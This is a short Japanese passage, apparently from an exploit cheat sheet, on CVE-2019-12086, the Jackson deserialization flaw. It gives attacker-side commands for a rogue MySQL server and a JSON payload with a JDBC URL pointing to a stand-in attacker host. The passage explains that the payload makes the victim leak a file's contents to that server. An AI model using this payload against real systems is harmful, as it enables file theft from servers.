
Jackson デシリアライズ
CVE-2019-12086 Jackson のデシリアライゼーション
python rogue_mysql_server.py
tail -f mysql.log
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
Jackson が悪意のあるJSON文字列をデシリアライズすると、悪意のあるMySQLサーバーに接続し、読み取られたファイルの内容が悪意のあるサーバーの mysql.log に書き込まれます。